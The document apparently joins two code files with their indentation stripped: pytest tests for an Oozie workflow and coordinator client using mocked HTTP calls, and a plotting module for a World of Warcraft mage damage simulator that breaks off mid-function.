mock_info.return_value = sample_workflow_suspended
assert api.job_workflow_resume(SAMPLE_WF_ACTION)
mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=resume')
mock_put.reset_mock()
mock_info.return_value = sample_workflow_running
assert not api.job_workflow_resume(SAMPLE_WF_ACTION)
assert not mock_put.called
mock_put.reset_mock()
def test_job_workflow_start_workflow(self, api, sample_workflow_running, sample_workflow_prep):
with mock.patch.object(api, '_put') as mock_put:
with mock.patch.object(api, 'job_workflow_info') as mock_info:
mock_info.return_value = sample_workflow_prep
assert api.job_workflow_start(SAMPLE_WF_ID)
mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=start')
mock_put.reset_mock()
mock_info.return_value = sample_workflow_running
assert not api.job_workflow_start(SAMPLE_WF_ID)
assert not mock_put.called
mock_put.reset_mock()
def test_job_workflow_start_workflow_action(self, api, sample_workflow_running, sample_workflow_prep):
with mock.patch.object(api, '_put') as mock_put:
with mock.patch.object(api, 'job_workflow_info') as mock_info:
mock_info.return_value = sample_workflow_prep
assert api.job_workflow_start(SAMPLE_WF_ACTION)
mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=start')
mock_put.reset_mock()
mock_info.return_value = sample_workflow_running
assert not api.job_workflow_start(SAMPLE_WF_ACTION)
assert not mock_put.called
mock_put.reset_mock()
class TestOozieClientJobSubmit(object):
def test_jobs_submit_coordinator(self, api, sample_coordinator_running):
with mock.patch.object(api, '_post') as mock_post:
with mock.patch.object(api, 'job_coordinator_info') as mock_info:
mock_info.return_value = sample_coordinator_running
mock_post.return_value = None
with pytest.raises(exceptions.OozieException) as err:
api.jobs_submit_coordinator('/dummy/coord-path')
assert 'Operation failed: submit coordinator' in str(err)
mock_post.assert_called_with('jobs', mock.ANY)
mock_post.reset_mock()
mock_post.return_value = {'id': SAMPLE_COORD_ID}
coord = api.jobs_submit_coordinator('/dummy/coord-path')
mock_post.assert_called_with('jobs', mock.ANY)
mock_info.assert_called_with(coordinator_id=SAMPLE_COORD_ID)
assert coord is sample_coordinator_running
mock_post.reset_mock()
def test_jobs_submit_coordinator_config(self, api, sample_coordinator_running):
with mock.patch.object(api, '_post') as mock_post:
with mock.patch.object(api, 'job_coordinator_info') as mock_info:
mock_info.return_value = sample_coordinator_running
mock_post.return_value = {'id': SAMPLE_COORD_ID}
api.jobs_submit_coordinator('/dummy/coord-path')
conf = mock_post.call_args[0][1].decode('utf-8')
assert '<name>oozie.coord.application.path</name><value>/dummy/coord-path</value>' in conf
assert '<name>user.name</name><value>oozie</value>' in conf
mock_post.reset_mock()
api.jobs_submit_coordinator('/dummy/coord-path', configuration={'test.prop': 'this is a test'})
conf = mock_post.call_args[0][1].decode('utf-8')
assert '<name>test.prop</name><value>this is a test</value>' in conf
mock_post.reset_mock()
def test_jobs_submit_workflow(self, api, sample_workflow_running):
with mock.patch.object(api, '_post') as mock_post:
with mock.patch.object(api, 'job_workflow_info') as mock_info:
mock_info.return_value = sample_workflow_running
mock_post.return_value = None
with pytest.raises(exceptions.OozieException) as err:
api.jobs_submit_workflow('/dummy/wf-path')
assert 'Operation failed: submit workflow' in str(err)
mock_post.assert_called_with('jobs', mock.ANY)
mock_post.reset_mock()
mock_post.return_value = {'id': SAMPLE_WF_ID}
wf = api.jobs_submit_workflow('/dummy/wf-path', start=True)
mock_post.assert_called_with('jobs?action=start', mock.ANY)
assert wf is sample_workflow_running
mock_post.reset_mock()
mock_post.return_value = {'id': SAMPLE_WF_ID}
wf = api.jobs_submit_workflow('/dummy/wf-path')
mock_post.assert_called_with('jobs', mock.ANY)
mock_info.assert_called_with(workflow_id=SAMPLE_WF_ID)
assert wf is sample_workflow_running
mock_post.reset_mock()
def test_jobs_submit_workflow_config(self, api, sample_workflow_running):
with mock.patch.object(api, '_post') as mock_post:
with mock.patch.object(api, 'job_workflow_info') as mock_info:
mock_info.return_value = sample_workflow_running
mock_post.return_value = {'id': SAMPLE_WF_ID}
api.jobs_submit_workflow('/dummy/wf-path')
conf = mock_post.call_args[0][1].decode('utf-8')
assert '<name>oozie.wf.application.path</name><value>/dummy/wf-path</value>' in conf
assert '<name>user.name</name><value>oozie</value>' in conf
mock_post.reset_mock()
api.jobs_submit_workflow('/dummy/wf-path', configuration={'test.prop': 'this is a test'})
conf = mock_post.call_args[0][1].decode('utf-8')
assert '<name>test.prop</name><value>this is a test</value>' in conf
mock_post.reset_mock()
| 66,946 | 21,463 |
import fns
import numpy as np
import sys
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
from .libs import tbc_mage_backend as bck
import importlib
importlib.reload(bck)
def read_stat_file(location, file, stats):
loc = '/'.join(location.split('/')[:-1])+'/'+file
with open(loc) as f:
#print('stats for '+location+': '+loc)
for line in f:
if '#' in line:
line = line.split('#')[0]
sp = line.split()
if len(sp)>1:
if not sp[0][0] == '#':
if sp[0] == 'intellect':
stats['intellect'] = float(sp[1].strip())
if sp[0] == 'spirit':
stats['spirit'] = float(sp[1].strip())
if sp[0] == 'common_spell_damage':
stats['common_spell_damage'] = float(sp[1].strip())
if sp[0] == 'crit_rating':
stats['crit_rating'] = float(sp[1].strip())
if sp[0] == 'hit_rating':
stats['hit_rating'] = float(sp[1].strip())
if sp[0] == 'mp5':
stats['mp5'] = float(sp[1].strip())
if sp[0] == 'fire_damage':
stats['fire_damage'] = float(sp[1].strip())
if sp[0] == 'frost_damage':
stats['frost_damage'] = float(sp[1].strip())
if sp[0] == 'arcane_damage':
stats['arcane_damage'] = float(sp[1].strip())
if sp[0] == 'haste_rating':
stats['haste_rating'] = float(sp[1].strip())
class mage_file:
def __init__(self,location):
self.location= location
self.label = 'no label'
self.stats = {}
self.talents = bck.make_talents()
self.burn_rot = []
self.save_rot = []
with open(location) as f:
for line in f:
if '#' in line:
line = line.split('#')[0]
sp = line.split()
if len(sp)>1:
if not sp[0][0] == '#':
if sp[0] == 'stats_file':
read_stat_file(location, sp[1], self.stats)
if sp[0] == 'intellect':
self.stats['intellect'] = float(sp[1].strip())
if sp[0] == 'spirit':
self.stats['spirit'] = float(sp[1].strip())
if sp[0] == 'common_spell_damage':
self.stats['common_spell_damage'] = float(sp[1].strip())
if sp[0] == 'crit_rating':
self.stats['crit_rating'] = float(sp[1].strip())
if sp[0] == 'hit_rating':
self.stats['hit_rating'] = float(sp[1].strip())
if sp[0] == 'mp5':
self.stats['mp5'] = float(sp[1].strip())
if sp[0] == 'fire_damage':
self.stats['fire_damage'] = float(sp[1].strip())
if sp[0] == 'frost_damage':
self.stats['frost_damage'] = float(sp[1].strip())
if sp[0] == 'arcane_damage':
self.stats['arcane_damage'] = float(sp[1].strip())
if sp[0] == 'haste_rating':
self.stats['haste_rating'] = float(sp[1].strip())
for talent in self.talents:
if sp[0] == talent:
self.talents[talent] = int(sp[1].strip())
if sp[0] == 'burn_rotation:':
for i in range(1,len(sp)):
self.burn_rot.append(sp[i])
if sp[0] == 'save_rotation:':
for i in range(1,len(sp)):
self.save_rot.append(sp[i])
if sp[0] == 'label':
self.label = ' '.join(sp[1:])
if sp[0] == 'color':
self.color = [0,0,0,1]
self.color[0] = float(sp[1])
self.color[1] = float(sp[2])
self.color[2] = float(sp[3])
def parse_rot(rot):
new_rot =[]
l = len(rot)
for i, spell in enumerate(rot):
if spell == 'fireball':
pos_ign = 0
if rot[(i+1)%l] == 'fireball':
pos_ign +=1
if rot[(i+2)%l] == 'fireball':
pos_ign +=1
elif rot[(i+2)%l] == 'scorch' and rot[(i+3)%l] == 'scorch':
pos_ign +=1
elif rot[(i+1)%l] == 'scorch' and rot[(i+2)%l] == 'scorch':
pos_ign +=1
if rot[(i+3)%l] == 'fireball':
pos_ign +=1
elif rot[(i+3)%l] == 'scorch' and rot[(i+4)%l] == 'scorch':
pos_ign +=1
if pos_ign == 2:
new_rot.append('fireball_13_one_tick')
elif pos_ign == 1:
new_rot.append('fireball_13_one_tick_one_roll')
elif pos_ign == 0:
new_rot.append('fireball_13_one_tick_no_roll')
elif spell == 'scorch':
pos_ign = 0
if rot[(i+1)%l] == 'fireball':
pos_ign +=1
if rot[(i+2)%l] == 'fireball':
pos_ign +=1
elif rot[(i+2)%l] == 'scorch' and rot[(i+3)%l] == 'scorch':
pos_ign +=1
elif rot[(i+1)%l] == 'scorch' and rot[(i+2)%l] == 'scorch':
pos_ign +=1
if rot[(i+3)%l] == 'fireball':
pos_ign +=1
elif rot[(i+3)%l] == 'scorch' and rot[(i+4)%l] == 'scorch':
pos_ign +=1
if pos_ign == 2:
new_rot.append('scorch_9')
elif pos_ign == 1:
new_rot.append('scorch_9_one_roll')
elif pos_ign == 0:
new_rot.append('scorch_9_no_roll')
new_rot.append('scorch_9')
elif spell == 'fireblast':
new_rot.append('fireblast')
elif spell == 'arcane_missiles':
new_rot.append('arcane_missiles_10')
elif spell == 'frostbolt':
new_rot.append('frostbolt_13')
elif spell == 'arcane_blast_0speed_0mana':
new_rot.append('arcane_blast_1_0speed_0mana')
elif spell == 'arcane_blast_1speed_1mana':
new_rot.append('arcane_blast_1_1speed_1mana')
elif spell == 'arcane_blast_2speed_2mana':
new_rot.append('arcane_blast_1_2speed_2mana')
elif spell == 'arcane_blast_3speed_3mana':
new_rot.append('arcane_blast_1_3speed_3mana')
elif spell == 'arcane_blast_1speed_0mana':
new_rot.append('arcane_blast_1_1speed_0mana')
elif spell == 'arcane_blast_2speed_0mana':
new_rot.append('arcane_blast_1_2speed_0mana')
elif spell == 'arcane_blast_3speed_0mana':
new_rot.append('arcane_blast_1_3speed_0mana')
else:
print('spell '+ spell+ ' not found, possible spells are:')
pos_spells = ['fireball_13_one_tick',
'fireball',
'scorch',
'fireblast',
#'pyroblast',
#'pom_pyroblast',
'arcane_missiles',
'arcane_blast_0speed_0mana',
'arcane_blast_1speed_1mana',
'arcane_blast_2speed_2mana',
'arcane_blast_3speed_3mana',
'arcane_blast_1speed_0mana',
'arcane_blast_2speed_0mana',
'arcane_blast_3speed_0mana',
'frostbolt',
]
for spell in pos_spells:
print(spell)
return new_rot
class moduleClass:
filetypes=['mage']
def __init__ (self, fig, locations, frame, ui):
self.fig=fig
self.frame=frame
self.locations=locations
self.ui=ui
def run(self):
if self.ui['save_check']:
try:
import os
os.makedirs(self.ui['save_filename'])
except:
None
ui=self.ui
fig=self.fig
#prepare figure
fig.clear()
#load mages
mage_colors = [[0.5,0,1,1],
[1,0.5,0,1],
[0.2,0.2,1,1],
[0,0,0,1],
[0.5,0,1,1],
[1,1,0,1],
[0.2,1,1,1],
[0,1,0,1],
]
self.mages=[]
for i, location in enumerate(self.locations):
self.mages.append(mage_file(location))
if self.mages[-1].save_rot[0] == 'arcane_frost_clearcasting_optimized':
None
elif self.mages[-1].save_rot[0] == 'fireball_spam_clearcasting_optimized':
None
elif self.mages[-1].save_rot[0] == 'frostbolt_spam_clearcasting_optimized':
None
elif self.mages[-1].save_rot[0] == 'scorch_spam_clearcasting_optimized':
None
else:
self.mages[-1].save_rot = parse_rot(self.mages[-1].save_rot)
if self.mages[-1].burn_rot[0] == 'None':
None
elif self.mages[-1].burn_rot[0] == 'AB_spam_clearcasting_optimized':
None
else:
self.mages[-1].burn_rot = parse_rot(self.mages[-1].burn_rot)
if not hasattr(self.mages[-1],'color'):
self.mages[-1].color = mage_colors[i%8]
for key in ['disable_arcane_power', 'disable_icy_veins', 'disable_cold_snap', 'disable_water_elemental', 'disable_combustion', 'disable_PoM_pyro', 'ignore_scorch_ramp']:
self.mages[-1].talents[key] = ui[key]
#load buffs
buff_cases = []
for i in range(5):
#merge coe and cos, as in patch 2.4(?)
ui['buff_case_'+str(i)+'_curse_of_shadow'] = ui['buff_case_'+str(i)+'_curse_of_elements']
buff_cases.append({})
buff_case_str = 'buff_case_'+str(i)+'_'
for key in ui:
if buff_case_str in key:
buff = key.split(buff_case_str)[1]
try:
buff_cases[i][buff] = int(ui[key])
except:
buff_cases[i][buff] = ui[key]
if buff_cases[i]['armor'] == 'mage armor':
buff_cases[i]['mage_armor'] = 1
buff_cases[i]['molten_armor'] = 0
else:
buff_cases[i]['mage_armor'] = 0
buff_cases[i]['molten_armor'] = 1
#buttons.append({'key': 'buff_case_'+str(k)+'armor', 'type': 'radio:text', 'texts': ['molten armor', 'mage armor']','default': '0', 'tab': 1, 'row': i})
#buttons.append({'key': 'buff_case_'+str(k)+'_molten_armor', 'type': 'check', 'text': 'molten armor','default': '1', 'tab': 1, 'row': i})
#buttons.append({'key': 'buff_case_'+str(k)+'_mage_armor', 'type': 'check', 'text': 'mage armor','default': '0', 'tab': 1, 'row': i})
#plot measurements
linestyles=['-','-.','--',(0, (3, 1, 1, 1, 1, 1)),':']
self.frame.hidden_figure.set_dpi(300)
self.frame.hidden_figure.set_size_inches(6,4)
#self.frame.update()
#self.frame.figure. canvas.draw()
if ui['plot_dmg']:
ax = fns.add_axis(self.fig,2)
ax.grid()
misc = []
for i, buff_case in enumerate(buff_cases):
linestyle = linestyles[i]
if buff_case['check'] == 1:
for mage in self.mages:
misc = plot_dps(ui, mage, buff_case, i, linestyle, ax, misc, fractions = ui['include_rotation_fractions'], DMG = True)
if ui['save_check']:
misc = []
self.frame.hidden_figure.clf()
tempax = self.frame.hidden_figure.add_subplot(111)
tempax.grid()
for i, buff_case in enumerate(buff_cases):
linestyle = linestyles[i]
if buff_case['check'] == 1:
for mage in self.mages:
misc = plot_dps(ui, mage, buff_case, i, linestyle, tempax, misc, fractions = ui['include_rotation_fractions'], DMG = True)
self.frame.hidden_figure.tight_layout()
#print(self.frame.tempfig)
self.frame.hidden_figure.savefig(ui['save_filename']+'/dmg.svg')
self.frame.hidden_figure.savefig(ui['save_filename']+'/dmg.png')
#self.frame.update()
#self.frame.figure.canvas.draw()
if ui['plot_dps']:
ax = fns.add_axis(self.fig,2)
ax.grid()
misc = []
for i, buff_case in enumerate(buff_cases):
linestyle = linestyles[i]
if buff_case['check'] == 1:
for mage in self.mages:
misc = plot_dps(ui, mage, buff_case, i, linestyle, ax, misc, fractions = ui['include_rotation_fractions'], DMG = False)
if ui['save_check']:
misc = []
self.frame.hidden_figure.clf()
tempax = self.frame.hidden_figure.add_subplot(111)
tempax.grid()
for i, buff_case in enumerate(buff_cases):
linestyle = linestyles[i]
if buff_case['check'] == 1:
for mage in self.mages:
misc = plot_dps(ui, mage, buff_case, i, linestyle, tempax, misc, fractions = ui['include_rotation_fractions'], DMG = False)
self.frame.hidden_figure.tight_layout()
#print(self.frame.tempfig)
self.frame.hidden_figure.savefig(ui['save_filename']+'/dps.svg')
self.frame.hidden_figure.savefig(ui['save_filename']+'/dps.png')
#self.frame.update()
#self.frame.figure.canvas.draw()
if ui['plot_compare_buff_states']:
num_buff_cases = 0
for i, buff_case in enumerate(buff_cases):
if buff_case['check'] == 1:
num_buff_cases+=1
if num_buff_cases>1:
ax = fns.add_axis(self.fig,2)
plot_compare_buff_states(ui, self.mages, buff_cases, linestyles, ax)
if ui['save_check']:
self.frame.hidden_figure.clf()
tempax = self.frame.hidden_figure.add_subplot(111)
plot_compare_buff_states(ui, self.mages, buff_cases, linestyles, tempax)
self.frame.hidden_figure.tight_layout()
#print(self.frame.tempfig)
self.frame.hidden_figure.savefig(ui['save_filename']+'/comp_buff_states.svg')
self.frame.hidden_figure.savefig(ui['save_filename']+'/comp_buff_states.png')
if ui['plot_compare_mages']:
if hasattr(self.frame,'default_mage'):
default_mage=mage_file(self.frame.default_mage)
if default_mage.save_rot[0] == 'arcane_frost_clearcasting_optimized':
None
elif default_mage.save_rot[0] == 'fireball_spam_clearcasting_optimized':
None
elif default_mage.save_rot[0] == 'frostbolt_spam_clearcasting_optimized':
None
elif default_mage.save_rot[0] == 'scorch_spam_clearcasting_optimized':
None
else:
default_mage.save_rot = parse_rot(default_mage.save_rot)
if default_mage.burn_rot[0] == 'None':
None
elif default_mage.burn_rot[0] == 'AB_spam_clearcasting_optimized':
None
else:
default_mage.burn_rot = parse_rot(default_mage.burn_rot)
if not hasattr(default_mage,'color'):
default_mage.color = mage_colors[i%8]
for key in ['disable_arcane_power', 'disable_icy_veins', 'disable_cold_snap', 'disable_water_elemental', 'disable_combustion', 'disable_PoM_pyro', 'ignore_scorch_ramp']:
default_mage.talents[key] = ui[key]
ax = fns.add_axis(self.fig,2)
plot_compare_mages(ui, default_mage, self.mages, buff_cases, linestyles, ax)
if ui['save_check']:
self.frame.hidden_figure.clf()
tempax = self.frame.hidden_figure.add_subplot(111)
plot_compare_mages(ui, default_mage, self.mages, buff_cases, linestyles, tempax)
self.frame.hidden_figure.tight_layout()
#print(self.frame.tempfig)
self.frame.hidden_figure.savefig(ui['save_filename']+'/comp_mages.svg')
self.frame.hidden_figure.savefig(ui['save_filename']+'/comp_mages.png')
if ui['plot_spell_dps']:
ax = fns.add_axis(self.fig,2)
plot_spell_dps(ui, self.mages, buff_cases, linestyles, ax)
if ui['save_check']:
self.frame.hidden_figure.clf()
tempax = self.frame.hidden_figure.add_subplot(111)
plot_spell_dps(ui, self.mages, buff_cases, linestyles, tempax)
self.frame.hidden_figure.tight_layout()
#print(self.frame.tempfig)
self.frame.hidden_figure.savefig(ui['save_filename']+'/spell_dps.svg')
self.frame.hidden_figure.savefig(ui['save_filename']+'/spell_dps.png')
#self.frame.figure.canvas.draw()
if ui['plot_spell_dpm']:
ax = fns.add_axis(self.fig,2)
plot_spell_dps(ui, self.mages, buff_cases, linestyles, ax, DPM= True)
if ui['save_check']:
self.frame.hidden_figure.clf()
tempax = self.frame.hidden_figure.add_subplot(111)
plot_spell_dps(ui, self.mages, buff_cases, linestyles, tempax, DPM= True)
self.frame.hidden_figure.tight_layout()
#print(self.frame.tempfig)
self.frame.hidden_figure.savefig(ui['save_filename']+'/spell_dpm.svg')
self.frame.hidden_figure.savefig(ui['save_filename']+'/spell_dpm.png')
#self.frame.figure.canvas.draw()
if ui['plot_stat_weights']:
ax = fns.add_axis(self.fig,2)
plot_stat_weights(ui, self.mages, buff_cases, linestyles, ax)
if ui['save_check']:
self.frame.hidden_figure.clf()
tempax = self.frame.hidden_figure.add_subplot(111)
plot_stat_weights(ui, self.mages, buff_cases, linestyles, tempax)
self.frame.hidden_figure.tight_layout()
#print(self.frame.tempfig)
self.frame.hidden_figure.savefig(ui['save_filename']+'/stat_weights.svg')
self.frame.hidden_figure.savefig(ui['save_filename']+'/stat_weights.png')
'''
ax.legend()
#set x and ylabel
ax.set_xlabel(ui['XYxlabel'])
ax.set_xlim([ui['XYxmin'],ui['XYxmax']])
ax.set_ylabel(ui['XYylabel'])
'''
if ui['save_check']:
self.fig.savefig(ui['save_filename']+'/all.svg')
self.fig.savefig(ui['save_filename']+'/all.png')
fig.canvas.draw()
self.frame.update()
def addButtons():
buttons=[
{'key': 'mage_tab_0_name', 'type': 'tabname', 'text': 'misc', 'tab': 0} ,
{'key': 'mage_tab_1_name', 'type': 'tabname', 'text': 'buffs', 'tab': 1} ,
{'key': 'plot_dmg', 'type': 'check', 'text': 'plot_dmg','default': '1', 'tab': 0, 'row': 0},
{'key': 'plot_dps', 'type': 'check', 'text': 'plot_dps','default': '1', 'tab': 0, 'row': 0},
{'key': 'include_rotation_fractions', 'type': 'check', 'text': 'include rotation fractions','default': '0', 'tab': 0, 'row': 0},
{'key': 'plot_compare_buff_states', 'type': 'check', 'text': 'plot_compare_buff_states','default': '1', 'tab': 0, 'row': 0},
{'key': 'set_default_mage', 'type': 'click', 'text': 'set_default_mage','bind': set_default_mage, 'tab': 0, 'row': 0},
{'key': 'plot_compare_mages', 'type': 'check', 'text': 'plot_compare_mages','default': '1', 'tab': 0, 'row': 0},
#{'key': 'clear_default_mage', 'type': 'click', 'text': 'set_default_mage','bind': clear_default_mage, 'tab': 10, 'row': 0},
{'key': 'plot_spell_dps', 'type': 'check', 'text': 'plot_spell_dps','default': '0', 'tab': 0, 'row': 0},
{'key': 'plot_spell_dpm', 'type': 'check', 'text': 'plot_spell_dpm','default': '0', 'tab': 0, 'row': 0},
{'key': 'plot_stat_weights', 'type': 'check', 'text': 'plot_stat_weights','default': '0', 'tab': 0, 'row': 0},
{'key': 'time_min', 'type': 'txt:float', 'text': 'time_min', 'default': '40', 'width': 4, 'tab': 0, 'row': 1} ,
{'key': 'time_max', 'type': 'txt:float', 'text': 'time_max', 'default': '180', 'width': 4, 'tab': 0, 'row': 1} ,
{'key': 'dps_min', 'type': 'txt:float', 'text': 'dps_min', 'default': '0', 'width': 4, 'tab': 0, 'row': 2} ,
{'key': 'dps_max', 'type': 'txt:float', 'text': 'dps_max', 'default': '2000', 'width': 4, 'tab': 0, 'row': 2} ,
{'key': 'stat_weight_ymax', 'type': 'txt:int', 'text': 'stat_weight_ymax', 'default': '2', 'width': 4, 'tab': 0, 'row': 2} ,
{'key': 'disable_arcane_power', 'type': 'check', 'text': 'disable_arcane_power','default': '0', 'tab': 0, 'row': 3},
{'key': 'disable_icy_veins', 'type': 'check', 'text': 'disable_icy_veins','default': '0', 'tab': 0, 'row': 3},
{'key': 'disable_cold_snap', 'type': 'check', 'text': 'disable_cold_snap','default': '0', 'tab': 0, 'row': 3},
{'key': 'disable_water_elemental', 'type': 'check', 'text': 'disable_water_elemental','default': '0', 'tab': 0, 'row': 3},
{'key': 'disable_combustion', 'type': 'check', 'text': 'disable_combustion','default': '0', 'tab': 0, 'row': 3},
{'key': 'disable_PoM_pyro', 'type': 'check', 'text': 'disable_PoM_pyro','default': '0', 'tab': 0, 'row': 3},
{'key': 'ignore_scorch_ramp', 'type': 'check', 'text': 'ignore_scorch_ramp','default': '0', 'tab': 0, 'row': 3},
]
j = len(buttons)
for k in range(5):
i=k*2
buttons.append({'key': 'buff_case_'+str(k)+'_check', 'type': 'check', 'text': 'Buffs '+str(k),'default': '0', 'tab': 1, 'row': i})
buttons.append({'key': 'buff_case_'+str(k)+'_label', 'type': 'txt', 'text': 'label:','default': 'buffs '+str(k), 'width': 10, 'tab': 1, 'row': i})
buttons.append({'key': 'buff_case_'+str(k)+'_arcane_intellect', 'type': 'check', 'text': 'AI','default': '1', 'tab': 1, 'row': i})
buttons.append({'key': 'buff_case_'+str(k)+'_armor', 'type': 'radio:text', 'texts': ['molten armor', 'mage armor'],'default': '0', 'tab': 1, 'row': i})
#buttons.append({'key': 'buff_case_'+str(k)+'_molten_armor', 'type': 'check', 'text': 'molten armor','default': '1', 'tab': 1, 'row': i})
#buttons.append({'key': 'buff_case_'+str(k)+'_mage_armor', 'type': 'check', 'text': 'mage armor','default': '0', 'tab': 1, 'row': i})
buttons.append({'key': 'buff_case_'+str(k)+'_misc_add_mana', 'type': 'txt:float', 'text': '| misc mana (mana ruby, potions, etc)','default': '2400','width': 5, 'tab': 1, 'row': i})
buttons.append({'key': 'buff_case_'+str(k)+'_innervate', 'type': 'txt:float', 'text': '# of innervates','default': '0','width': 2, 'tab': 1, 'row': i})
buttons.append({'key': 'buff_case_'+str(k)+'_dummy_label', 'type': 'label', 'text': ' ', 'tab': 1, 'row': i+1})
#{'key': 'XYxlabel', 'type': 'txt', 'text': 'x label', 'default': r'$2\theta$', 'width': 10, 'tab': 0, 'row': 1} ,
#buttons.append({'key': 'buff_case_'+str(k)+'_curse_of_shadow', 'type': 'check', 'text': 'CoS','default': '1', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_curse_of_elements', 'type': 'check', 'text': 'CoE','default': '1', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_malediction', 'type': 'check', 'text': 'Malediction','default': '1', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_divine_spirit', 'type': 'check', 'text': 'D.spirit','default': '1', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_improved_divine_spirit', 'type': 'check', 'text': 'Imp.d.spirit','default': '1', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_wrath_of_air_totem', 'type': 'check', 'text': 'WoA totem','default': '0', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_improved_wrath_of_air_totem', 'type': 'check', 'text': 'imp.WoA','default': '0', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_totem_of_wrath', 'type': 'check', 'text': 'totem of wrath','default': '0', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_mark_of_the_wild', 'type': 'check', 'text': 'MotW','default': '1', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_improved_mark_of_the_wild', 'type': 'check', 'text': 'imp.MotW','default': '1', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_blessing_of_kings', 'type': 'check', 'text': 'BoK','default': '1', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_blessing_of_wisdom', 'type': 'check', 'text': 'BoW','default': '1', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_judgement_of_wisdom', 'type': 'check', 'text': 'JoW','default': '1', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_shadow_priest_dps', 'type': 'txt:float', 'text': 'SP dps', 'default': '0', 'width': 4, 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_misery', 'type': 'check', 'text': 'misery','default': '0', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_2_tier5_set_bonus', 'type': 'check', 'text': '2_tier5_set_bonus','default': '0', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_spellfire_set', 'type': 'check', 'text': 'spellfire set','default': '0', 'tab': 1, 'row': i+1})
buttons[j]['default'] = 1
#{'key': 'XYxmin', 'type': 'txt:float', 'text': 'x min', 'default': '0', 'width': 4, 'tab': 0, 'row': 1} ,
#{'key': 'XYxmax', 'type': 'txt:float', 'text': 'x max', 'default': '120', 'width': 4, 'tab': 0, 'row': 1} ,
#{'key': 'XYxlabel', 'type': 'txt', 'text': 'x label', 'default': r'$2\theta$', 'width': 10, 'tab': 0, 'row': 1} ,
#{'key': 'XYnormalize', 'type': 'check', 'text': 'Normalize y-axis', 'tab': 0, 'row': 2} ,
#{'key': 'XYylabel_text', 'type': 'label', 'text': 'ylabel: ', 'tab': 0, 'row': 2} ,
#{'key': 'XYylabel', 'type': 'radio:text', 'texts': ['Counts', 'Intensity'], 'tab': 0, 'row': 2,'default': 0} ,
return buttons
import copy
def get_dmg(mage, buffs,times):
new_stats_0 = copy.deepcopy(mage.stats)
new_talents = copy.deepcopy(mage.talents)
bck.buff_me(new_stats_0, new_talents, buffs)
spells, new_stats = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config)
if mage.save_rot[0] == 'arcane_frost_clearcasting_optimized':
save_rot = bck.get_dps_mps_rot_clearcasting_optimal(new_stats_0, new_talents, bck.game_config, spells_to_cast = 20000)
elif mage.save_rot[0] == 'fireball_spam_clearcasting_optimized':
new_talents['force_clearcasting'] = -1
spells_no_c, stats_no_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config)
new_talents['force_clearcasting'] = 1
spells_forced_c, stats_forced_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config)
new_talents['force_clearcasting'] = 0 # reset
optimized_spells = [spells_no_c['fireball_13_one_tick']]*7
optimized_spells.append(spells_no_c['fireball_13_one_tick_one_roll'])
optimized_spells.append(spells_no_c['fireball_13_three_tick_no_roll'])
optimized_spells.append(spells_forced_c['arcane_missiles_10'])
save_rot = bck.get_dps_mps_rotation(optimized_spells)
elif mage.save_rot[0] == 'scorch_spam_clearcasting_optimized':
new_talents['force_clearcasting'] = -1
spells_no_c, stats_no_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config)
new_talents['force_clearcasting'] = 1
spells_forced_c, stats_forced_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config)
new_talents['force_clearcasting'] = 0 # reset
optimized_spells = [spells_no_c['scorch_9']]*7
optimized_spells.append(spells_no_c['scorch_9_no_roll'])
optimized_spells.append(spells_no_c['scorch_9_no_roll'])
optimized_spells.append(spells_forced_c['arcane_missiles_10'])
save_rot = bck.get_dps_mps_rotation(optimized_spells)
elif mage.save_rot[0] == 'frostbolt_spam_clearcasting_optimized':
new_talents['force_clearcasting'] = -1
spells_no_c, stats_no_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config)
new_talents['force_clearcasting'] = 1
spells_forced_c, stats_forced_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config)
new_talents['force_clearcasting'] = 0 # reset
optimized_spells = [spells_no_c['frostbolt_13']]*9
optimized_spells.append(spells_forced_c['arcane_missiles_10'])
save_rot = bck.get_dps_mps_rotation(optimized_spells)
else:
save_rot = bck.get_dps_mps_rotation([spells[x] for x in mage.save_rot])
if mage.burn_rot[0] == 'None':
burn_rot = [0,10**10]
elif mage.burn_rot[0] == 'AB_spam_clearcasting_optimized':
new_talents['force_clearcasting'] = -1
spells_no_c, stats_no_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config)
new_talents['force_clearcasting'] = 1
spells_forced_c, stats_forced_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config)
new_talents['force_clearcasting'] = 0 # reset
optimized_spells = [spells_no_c['arcane_blast_1_3speed_3mana']]*9
optimized_spells.append(spells_forced_c['arcane_missiles_10'])
burn_rot = bck.get_dps_mps_rotation(optimized_spells)
else:
burn_rot = bck.get_dps_mps_rotation([spells[x] for x in mage.burn_rot])
IV_replace = None
if 'arcane_frost_clearcasting_optimized' in mage.save_rot or 'arcane_blast_1_3speed_0mana' in mage.save_rot:
#print(mage.location)
